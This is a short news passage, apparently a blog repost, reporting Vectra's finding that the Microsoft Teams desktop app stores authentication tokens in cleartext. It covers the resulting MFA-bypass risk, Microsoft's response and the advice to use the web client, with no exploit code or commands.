Until Microsoft moves to update the Teams Desktop Application, we believe customers should consider using the web-based Teams application exclusively. Microsoft is aware of this issue and closed the case stating that it did not meet their bar for immediate servicing. Even worse, these stolen tokens allow attackers to conduct actions against MFA-enabled accounts, creating an MFA bypass. With these tokens, attackers can assume the token holder's identity for any actions possible through the Microsoft Teams client, including using that token for accessing Microsoft Graph API functions from an attacker's system. Our research discovered that the Microsoft Teams App stores authentication tokens in cleartext. The problem stems from the fact that Teams is an Electron-based app, and there is no support for encryption.
Described as an "attack path that enables malicious actors with file system access to steal credentials for any Microsoft Teams user who is signed in", the attack can be performed without the need for elevated privileges. The issue was discovered last month by researchers from Vectra's Protect team.
0 kommentar(er)
